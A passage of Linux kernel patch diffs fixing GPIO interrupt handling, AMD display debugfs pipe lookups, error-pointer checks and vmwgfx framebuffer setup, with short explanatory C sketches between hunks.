+-		irq_chip->irq_mask = tqmx86_gpio_irq_mask;
+-		irq_chip->irq_unmask = tqmx86_gpio_irq_unmask;
+-		irq_chip->irq_set_type = tqmx86_gpio_irq_set_type;
+-
+ 		/* Mask all interrupts */
+ 		tqmx86_gpio_write(gpio, 0, TQMX86_GPIIC);
+ 
+@@ -293,7 +353,7 @@ static int tqmx86_gpio_probe(struct platform_device *pdev)
+ 		tqmx86_gpio_write(gpio, irq_status, TQMX86_GPIIS);
+ 
+ 		girq = &chip->irq;
+-		girq->chip = irq_chip;
++		gpio_irq_chip_set_chip(girq, &tqmx86_gpio_irq_chip);
+ 		girq->parent_handler = tqmx86_gpio_irq_handler;
+ 		girq->num_parents = 1;
+ 		girq->parents = devm_kcalloc(&pdev->dev, 1,
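
The long comment in tqmx86_gpio_irq_handler() describes the core trick: hardware that only latches rising or falling edges can emulate IRQ_TYPE_EDGE_BOTH by reprogramming the trigger to the opposite edge after every interrupt, based on the current input level. A compressed sketch of that state machine, with the MMIO accesses stubbed out:

#include <stdbool.h>
#include <stdio.h>

enum trigger { TRIG_RISING, TRIG_FALLING };

static bool line_level;		/* stands in for the GPIO input register */

static bool read_level(void)
{
	return line_level;
}

static void set_trigger(enum trigger t)
{
	printf("armed %s edge\n", t == TRIG_RISING ? "rising" : "falling");
}

/* After every interrupt, arm the only edge that can occur next given
 * the current level; an edge racing with read_level() still latches a
 * fresh interrupt, so no transition is lost. */
static void rearm_for_both(void)
{
	set_trigger(read_level() ? TRIG_FALLING : TRIG_RISING);
}

int main(void)
{
	line_level = false;
	rearm_for_both();	/* low line: arm rising */
	line_level = true;	/* rising edge fires; handler runs */
	rearm_for_both();	/* high line: arm falling */
	return 0;
}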
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c
+index ff7dd17ad0763..dd34dfcd5af76 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c
+@@ -1369,16 +1369,13 @@ static ssize_t dp_dsc_clock_en_read(struct file *f, char __user *buf,
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx) {
+-		kfree(rd_buf);
+-		return -ENXIO;
+-	}
+-
+ 	dsc = pipe_ctx->stream_res.dsc;
+ 	if (dsc)
+ 		dsc->funcs->dsc_read_state(dsc, &dsc_state);
+@@ -1475,12 +1472,14 @@ static ssize_t dp_dsc_clock_en_write(struct file *f, const char __user *buf,
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx || !pipe_ctx->stream)
++	if (!pipe_ctx->stream)
+ 		goto done;
+ 
+ 	// Get CRTC state
+@@ -1560,16 +1559,13 @@ static ssize_t dp_dsc_slice_width_read(struct file *f, char __user *buf,
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx) {
+-		kfree(rd_buf);
+-		return -ENXIO;
+-	}
+-
+ 	dsc = pipe_ctx->stream_res.dsc;
+ 	if (dsc)
+ 		dsc->funcs->dsc_read_state(dsc, &dsc_state);
+@@ -1664,12 +1660,14 @@ static ssize_t dp_dsc_slice_width_write(struct file *f, const char __user *buf,
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx || !pipe_ctx->stream)
++	if (!pipe_ctx->stream)
+ 		goto done;
+ 
+ 	// Safely get CRTC state
+@@ -1749,16 +1747,13 @@ static ssize_t dp_dsc_slice_height_read(struct file *f, char __user *buf,
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx) {
+-		kfree(rd_buf);
+-		return -ENXIO;
+-	}
+-
+ 	dsc = pipe_ctx->stream_res.dsc;
+ 	if (dsc)
+ 		dsc->funcs->dsc_read_state(dsc, &dsc_state);
+@@ -1853,12 +1848,14 @@ static ssize_t dp_dsc_slice_height_write(struct file *f, const char __user *buf,
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx || !pipe_ctx->stream)
++	if (!pipe_ctx->stream)
+ 		goto done;
+ 
+ 	// Get CRTC state
+@@ -1934,16 +1931,13 @@ static ssize_t dp_dsc_bits_per_pixel_read(struct file *f, char __user *buf,
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx) {
+-		kfree(rd_buf);
+-		return -ENXIO;
+-	}
+-
+ 	dsc = pipe_ctx->stream_res.dsc;
+ 	if (dsc)
+ 		dsc->funcs->dsc_read_state(dsc, &dsc_state);
+@@ -2035,12 +2029,14 @@ static ssize_t dp_dsc_bits_per_pixel_write(struct file *f, const char __user *bu
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx || !pipe_ctx->stream)
++	if (!pipe_ctx->stream)
+ 		goto done;
+ 
+ 	// Get CRTC state
+@@ -2114,16 +2110,13 @@ static ssize_t dp_dsc_pic_width_read(struct file *f, char __user *buf,
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx) {
+-		kfree(rd_buf);
+-		return -ENXIO;
+-	}
+-
+ 	dsc = pipe_ctx->stream_res.dsc;
+ 	if (dsc)
+ 		dsc->funcs->dsc_read_state(dsc, &dsc_state);
+@@ -2175,16 +2168,13 @@ static ssize_t dp_dsc_pic_height_read(struct file *f, char __user *buf,
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx) {
+-		kfree(rd_buf);
+-		return -ENXIO;
+-	}
+-
+ 	dsc = pipe_ctx->stream_res.dsc;
+ 	if (dsc)
+ 		dsc->funcs->dsc_read_state(dsc, &dsc_state);
+@@ -2251,16 +2241,13 @@ static ssize_t dp_dsc_chunk_size_read(struct file *f, char __user *buf,
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx) {
+-		kfree(rd_buf);
+-		return -ENXIO;
+-	}
+-
+ 	dsc = pipe_ctx->stream_res.dsc;
+ 	if (dsc)
+ 		dsc->funcs->dsc_read_state(dsc, &dsc_state);
+@@ -2327,16 +2314,13 @@ static ssize_t dp_dsc_slice_bpg_offset_read(struct file *f, char __user *buf,
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx) {
+-		kfree(rd_buf);
+-		return -ENXIO;
+-	}
+-
+ 	dsc = pipe_ctx->stream_res.dsc;
+ 	if (dsc)
+ 		dsc->funcs->dsc_read_state(dsc, &dsc_state);
+diff --git a/drivers/gpu/drm/arm/display/komeda/komeda_pipeline_state.c b/drivers/gpu/drm/arm/display/komeda/komeda_pipeline_state.c
+index 916f2c36bf2f7..e200decd00c6d 100644
+--- a/drivers/gpu/drm/arm/display/komeda/komeda_pipeline_state.c
++++ b/drivers/gpu/drm/arm/display/komeda/komeda_pipeline_state.c
+@@ -259,7 +259,7 @@ komeda_component_get_avail_scaler(struct komeda_component *c,
+ 	u32 avail_scalers;
+ 
+ 	pipe_st = komeda_pipeline_get_state(c->pipeline, state);
+-	if (!pipe_st)
++	if (IS_ERR_OR_NULL(pipe_st))
+ 		return NULL;
+ 
+ 	avail_scalers = (pipe_st->active_comps & KOMEDA_PIPELINE_SCALERS) ^
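
komeda_pipeline_get_state() can hand back a valid pointer, NULL, or an ERR_PTR()-encoded errno; the old "!pipe_st" test let error pointers through to be dereferenced, which the IS_ERR_OR_NULL() check above closes off. The three-way return convention in a standalone sketch:

#include <stdio.h>

#define MAX_ERRNO	4095
#define ERR_PTR(err)	((void *)(long)(err))
#define IS_ERR(p)	((unsigned long)(p) >= (unsigned long)-MAX_ERRNO)
#define IS_ERR_OR_NULL(p)	(!(p) || IS_ERR(p))

static void *get_state(int fail)
{
	return fail ? ERR_PTR(-16) : (void *)"state";	/* -16 == -EBUSY */
}

int main(void)
{
	void *st = get_state(1);

	if (IS_ERR_OR_NULL(st)) {
		printf("no usable state\n");
		return 1;
	}
	printf("%s\n", (char *)st);
	return 0;
}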
+diff --git a/drivers/gpu/drm/bridge/panel.c b/drivers/gpu/drm/bridge/panel.c
+index 216af76d00427..cdfcdbecd4c80 100644
+--- a/drivers/gpu/drm/bridge/panel.c
++++ b/drivers/gpu/drm/bridge/panel.c
+@@ -306,9 +306,12 @@ EXPORT_SYMBOL(drm_panel_bridge_set_orientation);
+ 
+ static void devm_drm_panel_bridge_release(struct device *dev, void *res)
+ {
+-	struct drm_bridge **bridge = res;
++	struct drm_bridge *bridge = *(struct drm_bridge **)res;
+ 
+-	drm_panel_bridge_remove(*bridge);
++	if (!bridge)
++		return;
++
++	drm_bridge_remove(bridge);
+ }
+ 
+ /**
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_vidi.c b/drivers/gpu/drm/exynos/exynos_drm_vidi.c
+index fb941a8c99f0f..e17f9c5c9c90e 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_vidi.c
++++ b/drivers/gpu/drm/exynos/exynos_drm_vidi.c
+@@ -309,6 +309,7 @@ static int vidi_get_modes(struct drm_connector *connector)
+ 	struct vidi_context *ctx = ctx_from_connector(connector);
+ 	struct edid *edid;
+ 	int edid_len;
++	int count;
+ 
+ 	/*
+ 	 * the edid data comes from user side and it would be set
+@@ -328,7 +329,11 @@ static int vidi_get_modes(struct drm_connector *connector)
+ 
+ 	drm_connector_update_edid_property(connector, edid);
+ 
+-	return drm_add_edid_modes(connector, edid);
++	count = drm_add_edid_modes(connector, edid);
++
++	kfree(edid);
++
++	return count;
+ }
+ 
+ static const struct drm_connector_helper_funcs vidi_connector_helper_funcs = {
+diff --git a/drivers/gpu/drm/exynos/exynos_hdmi.c b/drivers/gpu/drm/exynos/exynos_hdmi.c
+index be2d9cbaaef2e..b0913bc81fc1c 100644
+--- a/drivers/gpu/drm/exynos/exynos_hdmi.c
++++ b/drivers/gpu/drm/exynos/exynos_hdmi.c
+@@ -887,11 +887,11 @@ static int hdmi_get_modes(struct drm_connector *connector)
+ 	int ret;
+ 
+ 	if (!hdata->ddc_adpt)
+-		return 0;
++		goto no_edid;
+ 
+ 	edid = drm_get_edid(connector, hdata->ddc_adpt);
+ 	if (!edid)
+-		return 0;
++		goto no_edid;
+ 
+ 	hdata->dvi_mode = !connector->display_info.is_hdmi;
+ 	DRM_DEV_DEBUG_KMS(hdata->dev, "%s : width[%d] x height[%d]\n",
+@@ -906,6 +906,9 @@ static int hdmi_get_modes(struct drm_connector *connector)
+ 	kfree(edid);
+ 
+ 	return ret;
++
++no_edid:
++	return drm_add_modes_noedid(connector, 640, 480);
+ }
+ 
+ static int hdmi_find_phy_conf(struct hdmi_context *hdata, u32 pixel_clock)
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_object.h b/drivers/gpu/drm/i915/gem/i915_gem_object.h
+index ea951e2f55b17..2c2be479acc1d 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_object.h
++++ b/drivers/gpu/drm/i915/gem/i915_gem_object.h
+@@ -295,7 +295,9 @@ bool i915_gem_object_has_iomem(const struct drm_i915_gem_object *obj);
+ static inline bool
+ i915_gem_object_is_shrinkable(const struct drm_i915_gem_object *obj)
+ {
+-	return i915_gem_object_type_has(obj, I915_GEM_OBJECT_IS_SHRINKABLE);
++	/* TODO: make DPT shrinkable when it has no bound vmas */
++	return i915_gem_object_type_has(obj, I915_GEM_OBJECT_IS_SHRINKABLE) &&
++		!obj->is_dpt;
+ }
+ 
+ static inline bool
+diff --git a/drivers/gpu/drm/i915/gt/intel_breadcrumbs.c b/drivers/gpu/drm/i915/gt/intel_breadcrumbs.c
+index ecc990ec1b952..f2973cd1a8aae 100644
+--- a/drivers/gpu/drm/i915/gt/intel_breadcrumbs.c
++++ b/drivers/gpu/drm/i915/gt/intel_breadcrumbs.c
+@@ -258,8 +258,13 @@ static void signal_irq_work(struct irq_work *work)
+ 		i915_request_put(rq);
+ 	}
+ 
++	/* Lazy irq enabling after HW submission */
+ 	if (!READ_ONCE(b->irq_armed) && !list_empty(&b->signalers))
+ 		intel_breadcrumbs_arm_irq(b);
++
++	/* And confirm that we still want irqs enabled before we yield */
++	if (READ_ONCE(b->irq_armed) && !atomic_read(&b->active))
++		intel_breadcrumbs_disarm_irq(b);
+ }
+ 
+ struct intel_breadcrumbs *
+@@ -310,13 +315,7 @@ void __intel_breadcrumbs_park(struct intel_breadcrumbs *b)
+ 		return;
+ 
+ 	/* Kick the work once more to drain the signalers, and disarm the irq */
+-	irq_work_sync(&b->irq_work);
+-	while (READ_ONCE(b->irq_armed) && !atomic_read(&b->active)) {
+-		local_irq_disable();
+-		signal_irq_work(&b->irq_work);
+-		local_irq_enable();
+-		cond_resched();
+-	}
++	irq_work_queue(&b->irq_work);
+ }
+ 
+ void intel_breadcrumbs_free(struct kref *kref)
+@@ -399,7 +398,7 @@ static void insert_breadcrumb(struct i915_request *rq)
+ 	 * the request as it may have completed and raised the interrupt as
+ 	 * we were attaching it into the lists.
+ 	 */
+-	if (!b->irq_armed || __i915_request_is_complete(rq))
++	if (!READ_ONCE(b->irq_armed) || __i915_request_is_complete(rq))
+ 		irq_work_queue(&b->irq_work);
+ }
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/Kconfig b/drivers/gpu/drm/vmwgfx/Kconfig
+index a4fabe208d9f0..faddae3d6ac2e 100644
+--- a/drivers/gpu/drm/vmwgfx/Kconfig
++++ b/drivers/gpu/drm/vmwgfx/Kconfig
+@@ -16,13 +16,6 @@ config DRM_VMWGFX
+ 	  virtual hardware.
+ 	  The compiled module will be called "vmwgfx.ko".
+ 
+-config DRM_VMWGFX_FBCON
+-	depends on DRM_VMWGFX && DRM_FBDEV_EMULATION
+-	bool "Enable framebuffer console under vmwgfx by default"
+-	help
+-	   Choose this option if you are shipping a new vmwgfx
+-	   userspace driver that supports using the kernel driver.
+-
+ config DRM_VMWGFX_MKSSTATS
+ 	bool "Enable mksGuestStats instrumentation of vmwgfx by default"
+ 	depends on DRM_VMWGFX
+diff --git a/drivers/gpu/drm/vmwgfx/Makefile b/drivers/gpu/drm/vmwgfx/Makefile
+index 68e350f410ad3..2a644f035597f 100644
+--- a/drivers/gpu/drm/vmwgfx/Makefile
++++ b/drivers/gpu/drm/vmwgfx/Makefile
+@@ -12,6 +12,4 @@ vmwgfx-y := vmwgfx_execbuf.o vmwgfx_gmr.o vmwgfx_kms.o vmwgfx_drv.o \
+ 	    vmwgfx_devcaps.o ttm_object.o vmwgfx_system_manager.o \
+ 	    vmwgfx_gem.o
+ 
+-vmwgfx-$(CONFIG_DRM_FBDEV_EMULATION) += vmwgfx_fb.o
+-
+ obj-$(CONFIG_DRM_VMWGFX) := vmwgfx.o
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
+index 53f63ad656a41..be27f9a3bf67b 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
+@@ -35,6 +35,7 @@
+ 
+ #include <drm/drm_aperture.h>
+ #include <drm/drm_drv.h>
++#include <drm/drm_fb_helper.h>
+ #include <drm/drm_gem_ttm_helper.h>
+ #include <drm/drm_ioctl.h>
+ #include <drm/drm_module.h>
+@@ -52,9 +53,6 @@
+ 
+ #define VMWGFX_DRIVER_DESC "Linux drm driver for VMware graphics devices"
+ 
+-#define VMW_MIN_INITIAL_WIDTH 800
+-#define VMW_MIN_INITIAL_HEIGHT 600
+-
+ /*
+  * Fully encoded drm commands. Might move to vmw_drm.h
+  */
+@@ -265,7 +263,6 @@ static const struct pci_device_id vmw_pci_id_list[] = {
+ };
+ MODULE_DEVICE_TABLE(pci, vmw_pci_id_list);
+ 
+-static int enable_fbdev = IS_ENABLED(CONFIG_DRM_VMWGFX_FBCON);
+ static int vmw_restrict_iommu;
+ static int vmw_force_coherent;
+ static int vmw_restrict_dma_mask;
+@@ -275,8 +272,6 @@ static int vmw_probe(struct pci_dev *, const struct pci_device_id *);
+ static int vmwgfx_pm_notifier(struct notifier_block *nb, unsigned long val,
+ 			      void *ptr);
+ 
+-MODULE_PARM_DESC(enable_fbdev, "Enable vmwgfx fbdev");
+-module_param_named(enable_fbdev, enable_fbdev, int, 0600);
+ MODULE_PARM_DESC(restrict_iommu, "Try to limit IOMMU usage for TTM pages");
+ module_param_named(restrict_iommu, vmw_restrict_iommu, int, 0600);
+ MODULE_PARM_DESC(force_coherent, "Force coherent TTM pages");
+@@ -626,8 +621,8 @@ static void vmw_get_initial_size(struct vmw_private *dev_priv)
+ 	width = vmw_read(dev_priv, SVGA_REG_WIDTH);
+ 	height = vmw_read(dev_priv, SVGA_REG_HEIGHT);
+ 
+-	width = max_t(uint32_t, width, VMW_MIN_INITIAL_WIDTH);
+-	height = max_t(uint32_t, height, VMW_MIN_INITIAL_HEIGHT);
++	width = max_t(uint32_t, width, VMWGFX_MIN_INITIAL_WIDTH);
++	height = max_t(uint32_t, height, VMWGFX_MIN_INITIAL_HEIGHT);
+ 
+ 	if (width > dev_priv->fb_max_width ||
+ 	    height > dev_priv->fb_max_height) {
+@@ -636,8 +631,8 @@ static void vmw_get_initial_size(struct vmw_private *dev_priv)
+ 		 * This is a host error and shouldn't occur.
+ 		 */
+ 
+-		width = VMW_MIN_INITIAL_WIDTH;
+-		height = VMW_MIN_INITIAL_HEIGHT;
++		width  = VMWGFX_MIN_INITIAL_WIDTH;
++		height = VMWGFX_MIN_INITIAL_HEIGHT;
+ 	}
+ 
+ 	dev_priv->initial_width = width;
+@@ -887,9 +882,6 @@ static int vmw_driver_load(struct vmw_private *dev_priv, u32 pci_id)
+ 
+ 	dev_priv->assume_16bpp = !!vmw_assume_16bpp;
+ 
+-	dev_priv->enable_fb = enable_fbdev;
+-
+-
+ 	dev_priv->capabilities = vmw_read(dev_priv, SVGA_REG_CAPABILITIES);
+ 	vmw_print_bitmap(&dev_priv->drm, "Capabilities",
+ 			 dev_priv->capabilities,
+@@ -946,13 +938,6 @@ static int vmw_driver_load(struct vmw_private *dev_priv, u32 pci_id)
+ 				vmw_read(dev_priv,
+ 					 SVGA_REG_SUGGESTED_GBOBJECT_MEM_SIZE_KB);
+ 
+-		/*
+-		 * Workaround for low memory 2D VMs to compensate for the
+-		 * allocation taken by fbdev
+-		 */
+-		if (!(dev_priv->capabilities & SVGA_CAP_3D))
+-			mem_size *= 3;
+-
+ 		dev_priv->max_mob_pages = mem_size * 1024 / PAGE_SIZE;
+ 		dev_priv->max_primary_mem =
+ 			vmw_read(dev_priv, SVGA_REG_MAX_PRIMARY_MEM);
+@@ -1136,12 +1121,6 @@ static int vmw_driver_load(struct vmw_private *dev_priv, u32 pci_id)
+ 			VMWGFX_DRIVER_PATCHLEVEL, UTS_RELEASE);
+ 	vmw_write_driver_id(dev_priv);
+ 
+-	if (dev_priv->enable_fb) {
+-		vmw_fifo_resource_inc(dev_priv);
+-		vmw_svga_enable(dev_priv);
+-		vmw_fb_init(dev_priv);
+-	}
+-
+ 	dev_priv->pm_nb.notifier_call = vmwgfx_pm_notifier;
+ 	register_pm_notifier(&dev_priv->pm_nb);
+ 
+@@ -1188,12 +1167,9 @@ static void vmw_driver_unload(struct drm_device *dev)
+ 	unregister_pm_notifier(&dev_priv->pm_nb);
+ 
+ 	vmw_sw_context_fini(dev_priv);
+-	if (dev_priv->enable_fb) {
+-		vmw_fb_off(dev_priv);
+-		vmw_fb_close(dev_priv);
+-		vmw_fifo_resource_dec(dev_priv);
+-		vmw_svga_disable(dev_priv);
+-	}
++	vmw_fifo_resource_dec(dev_priv);
++
++	vmw_svga_disable(dev_priv);
+ 
+ 	vmw_kms_close(dev_priv);
+ 	vmw_overlay_close(dev_priv);
+@@ -1331,8 +1307,6 @@ static void vmw_master_drop(struct drm_device *dev,
+ 	struct vmw_private *dev_priv = vmw_priv(dev);
+ 
+ 	vmw_kms_legacy_hotspot_clear(dev_priv);
+-	if (!dev_priv->enable_fb)
+-		vmw_svga_disable(dev_priv);
+ }
+ 
+ /**
+@@ -1528,25 +1502,19 @@ static int vmw_pm_freeze(struct device *kdev)
+ 		DRM_ERROR("Failed to freeze modesetting.\n");
+ 		return ret;
+ 	}
+-	if (dev_priv->enable_fb)
+-		vmw_fb_off(dev_priv);
+ 
+ 	vmw_execbuf_release_pinned_bo(dev_priv);
+ 	vmw_resource_evict_all(dev_priv);
+ 	vmw_release_device_early(dev_priv);
+ 	while (ttm_device_swapout(&dev_priv->bdev, &ctx, GFP_KERNEL) > 0);
+-	if (dev_priv->enable_fb)
+-		vmw_fifo_resource_dec(dev_priv);
++	vmw_fifo_resource_dec(dev_priv);
+ 	if (atomic_read(&dev_priv->num_fifo_resources) != 0) {
+ 		DRM_ERROR("Can't hibernate while 3D resources are active.\n");
+-		if (dev_priv->enable_fb)
+-			vmw_fifo_resource_inc(dev_priv);
++		vmw_fifo_resource_inc(dev_priv);
+ 		WARN_ON(vmw_request_device_late(dev_priv));
+ 		dev_priv->suspend_locked = false;
+ 		if (dev_priv->suspend_state)
+ 			vmw_kms_resume(dev);
+-		if (dev_priv->enable_fb)
+-			vmw_fb_on(dev_priv);
+ 		return -EBUSY;
+ 	}
+ 
+@@ -1566,24 +1534,19 @@ static int vmw_pm_restore(struct device *kdev)
+ 
+ 	vmw_detect_version(dev_priv);
+ 
+-	if (dev_priv->enable_fb)
+-		vmw_fifo_resource_inc(dev_priv);
++	vmw_fifo_resource_inc(dev_priv);
+ 
+ 	ret = vmw_request_device(dev_priv);
+ 	if (ret)
+ 		return ret;
+ 
+-	if (dev_priv->enable_fb)
+-		__vmw_svga_enable(dev_priv);
++	__vmw_svga_enable(dev_priv);
+ 
+ 	vmw_fence_fifo_up(dev_priv->fman);
+ 	dev_priv->suspend_locked = false;
+ 	if (dev_priv->suspend_state)
+ 		vmw_kms_resume(&dev_priv->drm);
+ 
+-	if (dev_priv->enable_fb)
+-		vmw_fb_on(dev_priv);
+-
+ 	return 0;
+ }
+ 
+@@ -1674,6 +1637,10 @@ static int vmw_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	if (ret)
+ 		goto out_unload;
+ 
++	vmw_fifo_resource_inc(vmw);
++	vmw_svga_enable(vmw);
++	drm_fbdev_generic_setup(&vmw->drm,  0);
++
+ 	vmw_debugfs_gem_init(vmw);
+ 	vmw_debugfs_resource_managers_init(vmw);
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
+index 136f1cdcf8cdf..b0c23559511a1 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
+@@ -62,6 +62,9 @@
+ #define VMWGFX_MAX_DISPLAYS 16
+ #define VMWGFX_CMD_BOUNCE_INIT_SIZE 32768
+ 
++#define VMWGFX_MIN_INITIAL_WIDTH 1280
++#define VMWGFX_MIN_INITIAL_HEIGHT 800
++
+ #define VMWGFX_PCI_ID_SVGA2              0x0405
+ #define VMWGFX_PCI_ID_SVGA3              0x0406
+ 
+@@ -551,7 +554,6 @@ struct vmw_private {
+ 	 * Framebuffer info.
+ 	 */
+ 
+-	void *fb_info;
+ 	enum vmw_display_unit_type active_display_unit;
+ 	struct vmw_legacy_display *ldu_priv;
+ 	struct vmw_overlay *overlay_priv;
+@@ -610,8 +612,6 @@ struct vmw_private {
+ 	struct mutex cmdbuf_mutex;
+ 	struct mutex binding_mutex;
+ 
+-	bool enable_fb;
+-
+ 	/**
+ 	 * PM management.
+ 	 */
+@@ -1178,35 +1178,6 @@ extern void vmw_generic_waiter_add(struct vmw_private *dev_priv, u32 flag,
+ extern void vmw_generic_waiter_remove(struct vmw_private *dev_priv,
+ 				      u32 flag, int *waiter_count);
+ 
+-
+-/**
+- * Kernel framebuffer - vmwgfx_fb.c
+- */
+-
+-#ifdef CONFIG_DRM_FBDEV_EMULATION
+-int vmw_fb_init(struct vmw_private *vmw_priv);
+-int vmw_fb_close(struct vmw_private *dev_priv);
+-int vmw_fb_off(struct vmw_private *vmw_priv);
+-int vmw_fb_on(struct vmw_private *vmw_priv);
+-#else
+-static inline int vmw_fb_init(struct vmw_private *vmw_priv)
+-{
+-	return 0;
+-}
+-static inline int vmw_fb_close(struct vmw_private *dev_priv)
+-{
+-	return 0;
+-}
+-static inline int vmw_fb_off(struct vmw_private *vmw_priv)
+-{
+-	return 0;
+-}
+-static inline int vmw_fb_on(struct vmw_private *vmw_priv)
+-{
+-	return 0;
+-}
+-#endif
+-
+ /**
+  * Kernel modesetting - vmwgfx_kms.c
+  */
